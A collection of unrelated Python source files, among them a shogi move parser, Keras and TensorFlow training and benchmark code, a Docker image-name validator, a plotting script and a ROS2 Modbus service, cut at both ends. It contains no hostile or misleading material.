%s " % dev_name res = ssh_client.execute(cmd) logger.warn(cmd) logger.warn(res) self.assertNotEqual(res, None, "Error getting iostat info") ret_data = ' '.join(map(str, res)).strip() return int(ret_data.split()[-1])
import re from app.modules.shogi import Koma str2info = { "一": 0, "1": 0, "1": 0, "二": 1, "2": 1, "2": 1, "三": 2, "3": 2, "3": 2, "四": 3, "4": 3, "4": 3, "五": 4, "5": 4, "5": 4, "六": 5, "6": 5, "6": 5, "七": 6, "7": 6, "7": 6, "八": 7, "8": 7, "8": 7, "九": 8, "9": 8, "9": 8 } str2koma = { "歩": Koma.fu, "と": Koma.promoted_fu, "成歩": Koma.promoted_fu, "成と": Koma.promoted_fu, "香": Koma.kyosha, "香車": Koma.kyosha, "成香": Koma.promoted_kyosha, "成香車": Koma.promoted_kyosha, "桂": Koma.keima, "桂馬": Koma.keima, "成桂": Koma.promoted_keima, "成桂馬": Koma.promoted_keima, "銀": Koma.gin, "銀将": Koma.gin, "成銀": Koma.promoted_gin, "成銀将": Koma.promoted_gin, "金": Koma.kin, "金将": Koma.kin, "成金": Koma.kin, "成金将": Koma.kin, "角": Koma.kaku, "角行": Koma.kaku, "馬": Koma.promoted_kaku, "成角": Koma.promoted_kaku, "成角行": Koma.promoted_kaku, "成馬": Koma.promoted_kaku, "飛": Koma.hisha, "飛車": Koma.hisha, "龍": Koma.promoted_hisha, "成飛": Koma.promoted_hisha, "成飛車": Koma.promoted_hisha, "成龍": Koma.promoted_hisha, "王": Koma.gyoku, "玉": Koma.gyoku, "王将": Koma.gyoku, "玉将": Koma.gyoku, "成王": Koma.gyoku, "成玉": Koma.gyoku, "成王将": Koma.gyoku, "成玉将": Koma.gyoku } str2oppkoma = { "歩": Koma.opponent_fu, "と": Koma.opponent_promoted_fu, "成歩": Koma.opponent_promoted_fu, "成と": Koma.opponent_promoted_fu, "香": Koma.opponent_kyosha, "香車": Koma.opponent_kyosha, "成香": Koma.opponent_promoted_kyosha, "成香車": Koma.opponent_promoted_kyosha, "桂": Koma.opponent_keima, "桂馬": Koma.opponent_keima, "成桂": Koma.opponent_promoted_keima, "成桂馬": Koma.opponent_promoted_keima, "銀": Koma.opponent_gin, "銀将": Koma.opponent_gin, "成銀": Koma.opponent_promoted_gin, "成銀将": Koma.opponent_promoted_gin, "金": Koma.opponent_kin, "金将": Koma.opponent_kin, "成金": Koma.opponent_kin, "成金将": Koma.opponent_kin, "角": Koma.opponent_kaku, "角行": Koma.opponent_kaku, "馬": Koma.opponent_promoted_kaku, "成角": Koma.opponent_promoted_kaku, "成角行": Koma.opponent_promoted_kaku, "成馬": Koma.opponent_promoted_kaku, "飛": Koma.opponent_hisha, "飛車": Koma.opponent_hisha, "龍": Koma.opponent_promoted_hisha, "成飛": Koma.opponent_promoted_hisha, "成飛車": Koma.opponent_promoted_hisha, "成龍": Koma.opponent_promoted_hisha, "王": Koma.opponent_gyoku, "玉": Koma.opponent_gyoku, "王将": Koma.opponent_gyoku, "玉将": Koma.opponent_gyoku, "成王": Koma.opponent_gyoku, "成玉": Koma.opponent_gyoku, "成王将": Koma.opponent_gyoku, "成玉将": Koma.opponent_gyoku } koma_names = [ "歩", "と", "香", "香車", "桂", "桂馬", "銀", "銀将", "金", "金将", "角", "角行", "馬", "飛", "飛車", "龍", "王", "玉", "王将", "玉将" ] koma_names += list(map(lambda n: "成" + n, koma_names)) def transposition_num(num): """ transposition axis(y) number. 0 => 8, 1 => 7, ..., 8 => 0 """ return (4 - num) + 4 class ParseInput: @staticmethod def parse(input_str, shogi): """ parse input text and get (from, to) Coordinate. """ is_first_turn = shogi.first def get_koma(): # input_str is only koma name if input_str in koma_names: if is_first_turn: koma = str2koma[input_str] else: koma = str2oppkoma[input_str] return koma return False # promote promote = False if input_str[-1] == ("成"): if input_str.find("打") != -1: return False if input_str[-2] == ("不"): input_str = input_str.replace("不成", "") else: # TODO : Detect to be able to promote promote = True input_str = input_str.replace("成", "") # same if input_str.find("同") != -1: idx = input_str.find("同") + 1 input_str = input_str[idx:] to_x = shogi.last_move_x to_y = shogi.last_move_y # get to_x, to_y from text else: if input_str[0] in str2info and input_str[0] in str2info: to_x = transposition_num(str2info[input_str[0]]) to_y = str2info[input_str[1]] else: # TODO : Send Error Message return False input_str = input_str[2:] # remove number of axis # setting from flag from_flag = 0 if input_str.find("上") != -1: from_flag = 1 input_str = input_str.replace("上", "") if input_str.find("右") != -1: from_flag += 2 input_str = input_str.replace("右", "") # 3 => 右上 if input_str.find("引") != -1: from_flag += 4 input_str = input_str.replace("引", "") # 5 => None # 6 => 右引 # 7 => None if input_str.find("左") != -1: from_flag += 8 input_str = input_str.replace("左", "") # 9 => 左上 # 10,11 => None # 12 => 左引 # 13~15 => None if input_str.find("寄") != -1: from_flag = 16 input_str = input_str.replace("寄", "") if input_str.find("直") != -1: from_flag = 17 input_str = input_str.replace("直", "") # drop if input_str.find("打") != -1: from_x = -1 from_y = -1 input_str = input_str.replace("打", "") koma = get_koma() if shogi.droppable(koma, to_x, to_y): return (from_x, from_y, to_x, to_y, promote, koma) else: return False # if in this block, input_str is only koma name koma = get_koma() if not koma: return False candidate_komas = shogi.find_koma(koma) movable_komas = [] for candidate_koma in candidate_komas: if shogi.movable(candidate_koma[0], candidate_koma[1], to_x, to_y, promote): movable_komas.append(candidate_koma) if len(movable_komas) == 0: # TODO : Send Error Message return False elif len(movable_komas) == 1: from_x = movable_komas[0][0] from_y = movable_komas[0][1] else: turn = is_first_turn # for pep # "上" if from_flag == 1: for t in movable_komas: # t => "t"arget if (turn and t[1] > to_y) or \ (not turn and t[1] < to_y): from_x, from_y = t from_flag = 0 break # "右" elif from_flag == 2: for t in movable_komas: if (turn and t[0] > to_x) or \ (not turn and t[0] < to_x): from_x, from_y = t from_flag = 0 break # "右上" elif from_flag == 3: for t in movable_komas: if (turn and t[0] > to_x and t[1] > to_y) or \ (not turn and t[0] < to_x and t[1] < to_y): from_x, from_y = t from_flag = 0 break # "引" elif from_flag == 4: for t in movable_komas: if (turn and t[1] < to_y) or \ (not turn and t[1] > to_y): from_x, from_y = t from_flag = 0 break # "右引" elif from_flag == 6: for t in movable_komas: if (turn and t[0] > to_x and t[1] < to_y) or \ (not turn and t[0] < to_x and t[1] > to_y): from_x, from_y = t from_flag = 0 break # "左" elif from_flag == 8: for t in movable_komas: if (turn and t[0] < to_x) or \ (not turn and t[0] > to_x): from_x, from_y = t from_flag = 0 break # "左上" elif from_flag == 9: for t in movable_komas: if (turn and t[0] < to_x and t[1] > to_y) or \ (not turn and t[0] > to_x and t[1] < to_y): from_x, from_y = t from_flag = 0 break # "左引" elif from_flag == 12: for t in movable_komas: if (turn and t[0] < to_x and t[1] < to_y) or \ (not turn and t[0] > to_x and t[1] > to_y): from_x, from_y = t from_flag = 0 break # "寄" elif from_flag == 16: for t in movable_komas: if (t[1] == to_y): from_x, from_y = t from_flag = 0 break # "直" elif from_flag == 17: for t in movable_komas: if (t[0] == to_x and ((turn and t[1] > to_y) or (not turn and t[1] < to_y))): from_x, from_y = t from_flag = 0 break # TODO : Send Error Message if from_flag != 0: return False return (from_x, from_y, to_x, to_y, promote, koma)
#!/usr/bin/python """ jboss.* scripts item Copyright (c) 2011 Vladimir Rusinov <vladimir@greenmice.info> Copyright (c) 2001 Wrike, Inc. [http://www.wrike.com] License: GNU GPL3 This file is part of ZTC [http://bitbucket.org/ztc/ztc/] Example usage: ./jboss.py get_prop jboss.system:type=ServerInfo FreeMemory """ from ztc.java.jboss import JMXJboss j = JMXJboss() m = j.args[0] j.get(m, *j.args[1:])
""" Adapted from keras example cifar10_cnn.py Train ResNet-18 on the CIFAR10 small images dataset. GPU run command with Theano backend (with TensorFlow, the GPU is automatically used): THEANO_FLAGS=mode=FAST_RUN,device=gpu,floatX=float32 python cifar10.py """ from __future__ import print_function from keras.datasets import cifar100 from keras.preprocessing.image import ImageDataGenerator from keras.utils import np_utils from keras.callbacks import ReduceLROnPlateau, CSVLogger, EarlyStopping from keras.callbacks import TensorBoard import os import tensorflow as tf import argparse import numpy as np import vgg7 import resnet #args parse = argparse.ArgumentParser() parse.add_argument("--layer_nums",help="the num of layers in each branch",default=18,type=int) parse.add_argument("--input_layers",help="the num of layers in each branch",nargs=4,default=[2,2,2,2],type=int) parse.add_argument("--backbone",help="backbone of the network",default="vgg7",type=str) parse.add_argument("--logPath",help="the path for log ",default="./logs/lalala/",type=str) parse.add_argument("--only_last",help="nouse merge use only last branch ",default=-1,type=int) args = parse.parse_args() lr_reducer = ReduceLROnPlateau(factor=np.sqrt(0.1), cooldown=0, patience=5, min_lr=0.5e-6) early_stopper = EarlyStopping(min_delta=0.00000000001, patience=100) csv_logger = CSVLogger('vgg7_modify_cifar100.csv') batch_size = 32 nb_classes = 100 nb_epoch = 400 data_augmentation = True # input image dimensions img_rows, img_cols = 32, 32 # The CIFAR100 images are RGB. img_channels = 3 # The data, shuffled and split between train and test sets: (X_train, y_train), (X_test, y_test) = cifar100.load_data(label_mode='fine') # Convert class vectors to binary class matrices. Y_train = np_utils.to_categorical(y_train, nb_classes) Y_test = np_utils.to_categorical(y_test, nb_classes) X_train = X_train.astype('float32') X_test = X_test.astype('float32') # subtract mean and normalize mean_image = np.mean(X_train, axis=0) X_train -= mean_image X_test -= mean_image X_train /= 128. X_test /= 128. #create model if(args.layer_nums==18): model = vgg7.vggBuilder.build_three_branch_18((img_channels, img_rows, img_cols), nb_classes) elif(args.layer_nums==34): model = vgg7.vggBuilder.build_three_branch_32((img_channels, img_rows, img_cols), nb_classes) elif(args.layer_nums==50): model = vgg7.vggBuilder.build_three_branch_50((img_channels, img_rows, img_cols), nb_classes) elif(args.layer_nums==101): model = vgg7.vggBuilder.build_three_branch_101((img_channels, img_rows, img_cols), nb_classes) elif(args.layer_nums==152): model = vgg7.vggBuilder.build_three_branch_152((img_channels, img_rows, img_cols), nb_classes) if(args.only_last==0): model = vgg7.vggBuilder.build_three_branch_18_only_last((img_channels, img_rows, img_cols), nb_classes,args.only_last) elif(args.only_last==1): model = vgg7.vggBuilder.build_three_branch_18_only_last_model1((img_channels, img_rows, img_cols), nb_classes,args.only_last) elif(args.only_last==2): model = vgg7.vggBuilder.build_three_branch_18_only_last_model2((img_channels, img_rows, img_cols), nb_classes,args.only_last) if(args.input_layers!=None): model = vgg7.vggBuilder.build_three_branch_input((img_channels, img_rows, img_cols), nb_classes,args.input_layers) if(args.backbone=="vgg7"): model = vgg7.vggBuilder.vgg7((img_channels, img_rows, img_cols), nb_classes) elif(args.backbone=="vggA"): model = vgg7.vggBuilder.vggA((img_channels, img_rows, img_cols), nb_classes) elif(args.backbone=="vggB"): model = vgg7.vggBuilder.vggB((img_channels, img_rows, img_cols), nb_classes) elif(args.backbone=="vggC"): model = vgg7.vggBuilder.vggC((img_channels, img_rows, img_cols), nb_classes) elif(args.backbone=="vggD"): model = vgg7.vggBuilder.vggD((img_channels, img_rows, img_cols), nb_classes) elif(args.backbone=="resnet18"): model = resnet.ResnetBuilder.build_resnet_18_old((img_channels, img_rows, img_cols), nb_classes) model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy']) logPath = args.logPath if(not os.path.exists(logPath)): os.makedirs(logPath) if not data_augmentation: print('Not using data augmentation.') model.fit(X_train, Y_train, batch_size=batch_size, nb_epoch=nb_epoch, validation_data=(X_test, Y_test), shuffle=True, callbacks=[lr_reducer, early_stopper, csv_logger,TensorBoard(log_dir=logPath)]) else: print('Using real-time data augmentation.') # This will do preprocessing and realtime data augmentation: datagen = ImageDataGenerator( featurewise_center=False, # set input mean to 0 over the dataset samplewise_center=False, # set each sample mean to 0 featurewise_std_normalization=False, # divide inputs by std of the dataset samplewise_std_normalization=False, # divide each input by its std zca_whitening=False, # apply ZCA whitening rotation_range=0, # randomly rotate images in the range (degrees, 0 to 180) width_shift_range=0.1, # randomly shift images horizontally (fraction of total width) height_shift_range=0.1, # randomly shift images vertically (fraction of total height) horizontal_flip=True, # randomly flip images vertical_flip=False) # randomly flip images # Compute quantities required for featurewise normalization # (std, mean, and principal components if ZCA whitening is applied). datagen.fit(X_train) # Fit the model on the batches generated by datagen.flow(). model.fit_generator(datagen.flow(X_train, Y_train, batch_size=batch_size), steps_per_epoch=X_train.shape[0] // batch_size, validation_data=(X_test, Y_test), epochs=nb_epoch, verbose=1, max_q_size=100, callbacks=[TensorBoard(log_dir=logPath),lr_reducer, early_stopper, csv_logger])
# @Author: Joey Teng # @Email: joey.teng.dev@gmail.com # @Filename: plot_datasets.py # @Last modified by: Joey Teng # @Last modified time: 31-Jul-2018 import argparse import collections import os import plotly import download_png class PlotGraph(object): @classmethod def __call__(cls, *args, **kwargs): return cls.run(*args, **kwargs) @classmethod def run(cls, path, _data): print("Plotting graph of: {}".format(path), flush=True) data = cls.plot_data_generation(_data) cls.plot( path, data) print("Graph Plotted: {}".format(path), flush=True) @classmethod def title_generation(cls, title, **kwargs): return "{}{}".format( title, "".join( ["<br>{}: {}".format(key, value) for key, value in kwargs.items()])) @classmethod def plot_data_generation(cls, _data): return [ plotly.graph_objs.Scatter( x=_data[0]['x'], y=_data[0]['y'], mode='markers', marker=dict( symbol='circle' ), name='category 0' ), plotly.graph_objs.Scatter( x=_data[1]['x'], y=_data[1]['y'], mode='markers', marker=dict( symbol='x' ), name='category 1' ) ] @classmethod def plot_offline(cls, fig, path): filename = "{}.html".format(path[:-len('.png')]) url = plotly.offline.plot( fig, image="png", image_filename=path[path.rfind('/') + 1:-len('.png')], filename=filename, auto_open=False) destination = path[:path.rfind('/')] try: download_png.download(destination, url) except RuntimeError: print("RuntimeError occurs when downloading {}".format(url), flush=True) return print("Offline Graph Plotted: {}".format(path), flush=True) @classmethod def plot(cls, path, data): fig = plotly.graph_objs.Figure(data=data) cls.plot_offline(fig, path) def load(args): path = args.i with open(path, 'r') as reader: labeled_points = reader.readlines() labeled_points = list(map( lambda row: tuple( (lambda cell: (float(cell[0]), float(cell[1]), int(cell[2]))) (row.split(','))), labeled_points)) return labeled_points def plot(points, args): path = args.save_image_to if (not path.startswith('/')): # Using relative path instead of absolute path = '{}/{}'.format(os.getcwd(), path) data = [collections.defaultdict(list), collections.defaultdict(list)] for point in points: data[point[2]]['x'].append(point[0]) data[point[2]]['y'].append(point[1]) PlotGraph()(path, data) def parse_args(): parser = argparse.ArgumentParser( description="Plot graphs for 2-D Binary Datasets" ) parser.add_argument('-i', action='store', type=str, default='data.in', help='Path to where the generated dataset is stored') parser.add_argument('--save_image_to', action='store', type=str, default="{}/data.png".format(os.getcwd()), help='Path to where the graph plotted is stored') return parser.parse_args() if __name__ == '__main__': args = parse_args() points = load(args) if points: plot(points, args)
"""This package defines Tag a way of representing an image uri.""" class BadNameException(Exception): """Exceptions when a bad docker name is supplied.""" _REPOSITORY_CHARS = 'abcdefghijklmnopqrstuvwxyz0123456789_-./' _TAG_CHARS = 'abcdefghijklmnopqrstuvwxyz0123456789_-.ABCDEFGHIJKLMNOPQRSTUVWXYZ' # These have the form: sha256:<hex string> _DIGEST_CHARS = 'sh:0123456789abcdef' def _check_element(name, element, characters, min_len, max_len): """Checks a given named element matches character and length restrictions. Args: name: str, the name of the element being validated element: str, the actual element being checked characters: str, acceptable characters for this element, or None min_len: int, minimum element length, or None max_len: int, maximum element length, or None Raises: BadNameException: one of the restrictions was not met. """ length = len(element) if min_len and length < min_len: raise BadNameException('Invalid %s: %s, must be at least %s characters' % (name, element, min_len)) if max_len and length > max_len: raise BadNameException('Invalid %s: %s, must be at most %s characters' % (name, element, max_len)) if element.strip(characters): raise BadNameException('Invalid %s: %s, acceptable characters include: %s' % (name, element, characters)) def _check_repository(repository): _check_element('repository', repository, _REPOSITORY_CHARS, 4, 255) def _check_tag(tag): _check_element('tag', tag, _TAG_CHARS, 1, 127) def _check_digest(digest): _check_element('digest', digest, _DIGEST_CHARS, 7 + 64, 7 + 64) class Repository(object): """Stores a docker repository name in a structured form.""" def __init__(self, name): if not name: raise BadNameException('A Docker image name must be specified') parts = name.split('/', 1) if len(parts) != 2: raise self._validation_exception(name) self._registry = parts[0] self._repository = parts[1] _check_repository(self._repository) def _validation_exception(self, name): return BadNameException('Docker image name must have the form: ' 'registry/repository, saw: %s' % name) @property def registry(self): return self._registry @property def repository(self): return self._repository def __str__(self): return '{registry}/{repository}'.format( registry=self.registry, repository=self.repository) class Tag(Repository): """Stores a docker repository tag in a structured form.""" def __init__(self, name): parts = name.split(':') if len(parts) != 2: raise self._validation_exception(name) self._tag = parts[1] _check_tag(self._tag) super(Tag, self).__init__(parts[0]) def _validation_exception(self, name): return BadNameException('Docker image name must be fully qualified (e.g.' 'registry/repository:tag) saw: %s' % name) @property def tag(self): return self._tag def __str__(self): return '{base}:{tag}'.format(base=super(Tag, self).__str__(), tag=self.tag) class Digest(Repository): """Stores a docker repository digest in a structured form.""" def __init__(self, name): parts = name.split('@') if len(parts) != 2: raise self._validation_exception(name) self._digest = parts[1] _check_digest(self._digest) super(Digest, self).__init__(parts[0]) def _validation_exception(self, name): return BadNameException('Docker image name must be fully qualified (e.g.' 'registry/repository@digest) saw: %s' % name) @property def digest(self): return self._digest def __str__(self): return '{base}@{digest}'.format(base=super(Digest, self).__str__(), digest=self.digest)
import rclpy from rclpy.node import Node from ament_index_python.packages import get_package_share_directory pp_share = get_package_share_directory('pickplace') pp_library = pp_share + '/pickplace/pp_library' from pp_library import Modbus from pickplace_msgs.srv import AskModbus class ModbusService(Node): def __init__(self): super().__init__('modbus_service') self.modbus = Modbus.ModbusClass() self.srv = self.create_service(AskModbus, 'ask_modbus', self.ask_modbus_callback) def ask_modbus_callback(self, request, response): if (request.req == 'get_base'): response.position = self.modbus.get_base() elif (request.req == 'get_pos'): response.position = self.modbus.get_pos() elif (request.req == 'init_io'): self.modbus.init_io() elif (request.req == 'open_io'): self.modbus.open_io() elif (request.req == 'close_io'): self.modbus.close_io() return response def main(args=None): rclpy.init(args=args) modbus_service = ModbusService() rclpy.spin(modbus_service) rclpy.shutdown() if __name__ == '__main__': main()
# Copyright 2017 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """TensorFlow benchmark library. See the README for more information. """ from __future__ import absolute_import from __future__ import division from __future__ import print_function import argparse from collections import namedtuple import contextlib import datetime import math import multiprocessing import os import re import threading import time import traceback from absl import flags as absl_flags import numpy as np import six from six.moves import xrange # pylint: disable=redefined-builtin import tensorflow as tf import cnn_util import constants import datasets import flags import mlperf import variable_mgr import variable_mgr_util from cnn_util import log_fn from models import model_config from platforms import util as platforms_util from google.protobuf import text_format from tensorflow.contrib.compiler import xla from tensorflow.core.protobuf import rewriter_config_pb2 from tensorflow.python import debug as tf_debug from tensorflow.python.client import timeline from tensorflow.python.data.experimental.ops import prefetching_ops from tensorflow.python.framework import graph_util from tensorflow.python.framework import graph_util_impl from tensorflow.python.framework import importer from tensorflow.python.ops import data_flow_ops from tensorflow.python.platform import gfile from tensorflow.python.util import nest _DEFAULT_NUM_BATCHES = 100 # GraphInfo encapsulates the tensors/ops that we care about after building a # graph. We use them to benchmark the graph. GraphInfo = namedtuple( # pylint: disable=invalid-name 'GraphInfo', [ # Ops that produce the input batches (before preprocessing). 'input_producer_op', # Ops that adds the preprocessed images to the staging areas 'enqueue_ops', # Fetches of sess.run() 'fetches', # Op that performs synchronization in distributed mode 'execution_barrier', # The global step variable 'global_step', # Group of ops that perform per-device initialization work 'local_var_init_op_group', # Op to produce summaries 'summary_op' ]) # InputProcessingInfo contains various sources of inputs which will be later fed # into the model. If synthetic data is used, all four fields are None. InputProcessingInfo = namedtuple( 'InputProcessingInfo', [ # The first two fields are non-None iff datasets prefetching is not # used. # Ops that produce the input batches. 'input_producer_op', # A list of StagingArea for each device. 'input_producer_stages', # Input produced using FunctionBufferingResource. Non-None iff datasets # prefetching is used and --use_multi_device_iterator=False 'function_buffering_resources', # Input produced using multi device iterator. Non-None iff datasets # prefetching is used and --use_multi_device_iterator=True 'multi_device_iterator_input' ]) # TODO(reedwm): add upper_bound and lower_bound to appropriate integer and # float flags, and change certain string flags to enum flags. flags.DEFINE_string('model', 'trivial', 'Name of the model to run, the list of supported models ' 'are defined in models/model.py') # The code will first check if it's running under benchmarking mode # or evaluation mode, depending on 'eval': # Under the evaluation mode, this script will read a saved model, # and compute the accuracy of the model against a validation dataset. # Additional ops for accuracy and top_k predictors are only used under # this mode. # Under the benchmarking mode, user can specify whether nor not to use # the forward-only option, which will only compute the loss function. # forward-only cannot be enabled with eval at the same time. flags.DEFINE_boolean('eval', False, 'whether use eval or benchmarking') flags.DEFINE_integer('eval_interval_secs', 0, 'How often to run eval on saved checkpoints. Usually the ' 'same as save_model_secs from the corresponding training ' 'run. Pass 0 to eval only once.') flags.DEFINE_integer('eval_during_training_every_n_steps', None, 'Every n steps during training, pause training, run ' 'evaluation, then resume training. Must not be used with ' '--eval, as unlike --eval, this option causes both ' 'training and eval to be done. This may take slightly ' 'more GPU memory than running just training or evaluation ' 'alone. It also may slightly slow down training, even ' 'when not taking into account the additional time to ' 'evaluate.', lower_bound=1) flags.DEFINE_float('eval_during_training_every_n_epochs', None, 'After every n training epochs, pause training, run ' 'evaluation, then resume training. See ' '--eval_during_training_every_n_steps for more information.') flags.DEFINE_list('eval_during_training_at_specified_steps', [], 'Specify a list of training steps, pause training at each of ' 'these steps, run evaluation, then resume training. See ' '--eval_during_training_every_n_steps for more information.') flags.DEFINE_list('eval_during_training_at_specified_epochs', [], 'Specify a list of training epochs, pause training after ' 'each of these epochs, run evaluation, then resume training. ' 'See --eval_during_training_every_n_steps for more ' 'information.') flags.DEFINE_boolean('forward_only', False, 'whether use forward-only or training for benchmarking') flags.DEFINE_boolean('freeze_when_forward_only', False, 'whether to freeze the graph when in forward-only mode.') flags.DEFINE_boolean('print_training_accuracy', False, 'whether to calculate and print training accuracy during ' 'training') flags.DEFINE_integer('batch_size', 0, 'batch size per compute device') flags.DEFINE_integer('eval_batch_size', 0, 'eval batch size per compute device') flags.DEFINE_integer('batch_group_size', 1, 'number of groups of batches processed in the image ' 'producer.') flags.DEFINE_integer('num_batches', None, 'number of batches to run, excluding ' 'warmup. Defaults to %d' % _DEFAULT_NUM_BATCHES) flags.DEFINE_integer('num_eval_batches', None, 'number of eval batches to run, excluding warmup. ' 'Defaults to --num_batches') flags.DEFINE_float('num_epochs', None, 'number of epochs to run, excluding warmup. ' 'This and --num_batches cannot both be specified.') flags.DEFINE_float('num_eval_epochs', None, 'number of eval epochs to run, excluding warmup. ' 'Defaults to --num_epochs') flags.DEFINE_float('stop_at_top_1_accuracy', None, 'If set, stops training after the evaluation accuracy hits ' 'this number. Can only be used with one of the ' '--eval_during_training_* flags.') flags.DEFINE_boolean('collect_eval_results_async', False, 'If True, start a separate process to postprocess eval ' 'results asynchronously. This currently only works with ' 'the SSD model.') flags.DEFINE_integer('num_warmup_batches', None, 'number of batches to run before timing') flags.DEFINE_integer('autotune_threshold', None, 'The autotune threshold for the models') flags.DEFINE_integer('num_gpus', 1, 'the number of GPUs to run on') flags.DEFINE_string('gpu_indices', '', 'indices of worker GPUs in ring order') flags.DEFINE_integer('display_every', 10, 'Number of local steps after which progress is printed ' 'out') flags.DEFINE_float('display_perf_ewma', None, 'If set, display numbers of images/sec using exponentially ' 'weighted moving avearge with the specified weight, which ' 'defines how much current value contributes to the reported ' 'average. Increasing weight makes the reported performance ' 'number reflect more about the real-time speed instead of ' 'the entire history', lower_bound=0, upper_bound=1) flags.DEFINE_string('data_dir', None, 'Path to dataset in TFRecord format (aka Example ' 'protobufs). If not specified, synthetic data will be ' 'used.') flags.DEFINE_string('data_name', None, 'Name of dataset: imagenet or cifar10. If not specified, ' 'it is automatically guessed based on data_dir.') flags.DEFINE_string('resize_method', 'bilinear', 'Method for resizing input images: crop, nearest, ' 'bilinear, bicubic, area, or round_robin. The `crop` mode ' 'requires source images to be at least as large as the ' 'network input size. The `round_robin` mode applies ' 'different resize methods based on position in a batch in ' 'a round-robin fashion. Other modes support any sizes and ' 'apply random bbox distortions before resizing (even with ' 'distortions=False).') flags.DEFINE_boolean('distortions', True, 'Enable/disable distortions during image preprocessing. ' 'These include bbox and color distortions.') flags.DEFINE_boolean('use_datasets', True, 'Enable use of datasets for input pipeline') flags.DEFINE_string('input_preprocessor', 'default', 'Name of input preprocessor. The list of supported input ' 'preprocessors are defined in preprocessing.py.') flags.DEFINE_string('gpu_thread_mode', 'gpu_private', 'Methods to assign GPU host work to threads. ' 'global: all GPUs and CPUs share the same global threads; ' 'gpu_private: a private threadpool for each GPU; ' 'gpu_shared: all GPUs share the same threadpool.') flags.DEFINE_integer('per_gpu_thread_count', 0, 'The number of threads to use for GPU. Only valid when ' 'gpu_thread_mode is not global.') flags.DEFINE_boolean('hierarchical_copy', False, 'Use hierarchical copies. Currently only optimized for ' 'use on a DGX-1 with 8 GPUs and may perform poorly on ' 'other hardware. Requires --num_gpus > 1, and only ' 'recommended when --num_gpus=8') # TODO(hinsu): Support auto-detection of the network topology while still # retaining the ability to specify a particular topology for debugging. flags.DEFINE_enum( 'network_topology', constants.NetworkTopology.DGX1, (constants.NetworkTopology.DGX1, constants.NetworkTopology.GCP_V100), 'Network topology specifies the topology used to connect multiple devices. ' 'Network topology is used to decide the hierarchy to use for the ' 'hierarchical_copy.') flags.DEFINE_integer('gradient_repacking', 0, 'Use gradient repacking. It' 'currently only works with replicated mode. At the end of' 'of each step, it repacks the gradients for more efficient' 'cross-device transportation. A non-zero value specifies' 'the number of split packs that will be formed.', lower_bound=0) flags.DEFINE_boolean('compact_gradient_transfer', True, 'Compact gradient' 'as much as possible for cross-device transfer and ' 'aggregation.') flags.DEFINE_enum('variable_consistency', 'strong', ('strong', 'relaxed'), 'The data consistency for trainable variables. With strong ' 'consistency, the variable always have the updates from ' 'previous step. With relaxed consistency, all the updates ' 'will eventually show up in the variables. Likely one step ' 'behind.') flags.DEFINE_boolean('datasets_repeat_cached_sample', False, 'Enable use of a special datasets pipeline that reads a ' 'single TFRecord into memory and repeats it infinitely ' 'many times. The purpose of this flag is to make it ' 'possible to write regression tests that are not ' 'bottlenecked by CNS throughput. ' 'Use datasets_use_caching to cache input data.') flags.DEFINE_enum('local_parameter_device', 'gpu', ('cpu', 'gpu', 'CPU', 'GPU'), 'Device to use as parameter server: cpu or gpu. For ' 'distributed training, it can affect where caching of ' 'variables happens.') flags.DEFINE_enum('device', 'gpu', ('cpu', 'gpu', 'CPU', 'GPU'), 'Device to use for computation: cpu or gpu') flags.DEFINE_enum('data_format', 'NCHW', ('NHWC', 'NCHW'), 'Data layout to use: NHWC (TF native) or NCHW (cuDNN ' 'native, requires GPU).') flags.DEFINE_integer('num_intra_threads', None, 'Number of threads to use for intra-op parallelism. If ' 'set to 0, the system will pick an appropriate number.') flags.DEFINE_integer('num_inter_threads', 0, 'Number of threads to use for inter-op parallelism. If ' 'set to 0, the system will pick an appropriate number.') flags.DEFINE_string('trace_file', '', 'Enable TensorFlow tracing and write trace to this file.') flags.DEFINE_boolean('use_chrome_trace_format', True, 'If True, the trace_file, if specified, will be in a ' 'Chrome trace format. If False, then it will be a ' 'StepStats raw proto.') _NUM_STEPS_TO_PROFILE = 10 _NUM_OPS_TO_PRINT = 20 flags.DEFINE_string('tfprof_file', None, 'If specified, write a tfprof ProfileProto to this file. ' 'The performance and other aspects of the model can then ' 'be analyzed with tfprof. See ' 'https://github.com/tensorflow/tensorflow/blob/master/tensorflow/core/profiler/g3doc/command_line.md ' # pylint: disable=line-too-long 'for more info on how to do this. The first %d steps ' 'are profiled. Additionally, the top %d most time ' 'consuming ops will be printed.\n' 'Note: profiling with tfprof is very slow, but most of the ' 'overhead is spent between steps. So, profiling results ' 'are more accurate than the slowdown would suggest.' % (_NUM_STEPS_TO_PROFILE, _NUM_OPS_TO_PRINT)) flags.DEFINE_string('graph_file', None, 'Write the model\'s graph definition to this file. ' 'Defaults to binary format unless filename ends in "txt".') flags.DEFINE_string('partitioned_graph_file_prefix', None, 'If specified, after the graph has been partitioned and ' 'optimized, write out each partitioned graph to a file ' 'with the given prefix.') flags.DEFINE_enum('optimizer', 'sgd', ('momentum', 'sgd', 'rmsprop', 'adam'), 'Optimizer to use') flags.DEFINE_float('init_learning_rate', None, 'Initial learning rate for training.') flags.DEFINE_string('piecewise_learning_rate_schedule', None, 'Specifies a piecewise learning rate schedule based on the ' 'number of epochs. This is the form LR0;E1;LR1;...;En;LRn, ' 'where each LRi is a learning rate and each Ei is an epoch ' 'indexed from 0. The learning rate is LRi if the ' 'E(i-1) <= current_epoch < Ei. For example, if this ' 'paramater is 0.3;10;0.2;25;0.1, the learning rate is 0.3 ' 'for the first 10 epochs, then is 0.2 for the next 15 ' 'epochs, then is 0.1 until training ends.') flags.DEFINE_float('num_epochs_per_decay', 0, 'Steps after which learning rate decays. If 0, the learning ' 'rate does not decay.') flags.DEFINE_float('learning_rate_decay_factor', 0, 'Learning rate decay factor. Decay by this factor every ' '`num_epochs_per_decay` epochs. If 0, learning rate does ' 'not decay.') flags.DEFINE_float('num_learning_rate_warmup_epochs', 0, 'Slowly increase to the initial learning rate in the first ' 'num_learning_rate_warmup_epochs linearly.') flags.DEFINE_float('minimum_learning_rate', 0, 'The minimum learning rate. The learning rate will ' 'never decay past this value. Requires `learning_rate`, ' '`num_epochs_per_decay` and `learning_rate_decay_factor` to ' 'be set.') flags.DEFINE_float('resnet_base_lr', 